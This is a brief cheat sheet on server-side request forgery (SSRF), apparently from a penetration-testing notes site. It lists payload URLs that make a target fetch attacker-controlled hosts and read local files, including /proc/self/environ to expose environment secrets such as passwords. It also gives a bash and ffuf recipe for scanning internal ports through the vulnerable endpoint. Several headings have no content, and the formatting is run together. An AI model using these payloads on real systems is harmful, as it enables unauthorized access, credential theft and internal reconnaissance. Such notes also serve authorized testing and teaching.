SSRF
Server-Side Request Forgery.
Payload
Remote files
http://<TARGET>/load?q=http://<IP>:<PORT>Local files
http://<TARGET>/load?q=file://<ABSOLUTE_PATH>
http://<TARGET>/load?q=file:///proc/self/environ # environment variables, like pwdPort Scanning
for port in {1..65535};do echo $port >> ports.txt; donecurl -i -s "http://<TARGET_IP>/load?q=http://127.0.0.1:1”
# recovery length closed doorffuf -w ./ports.txt:PORT -u "http://<TARGET_IP>/load?q=http://127.0.0.1:PORT" -fs 30Encoding IP
HTTP Redirection
DNS Rebinding
Inconsistencies on URL Parser
Last updated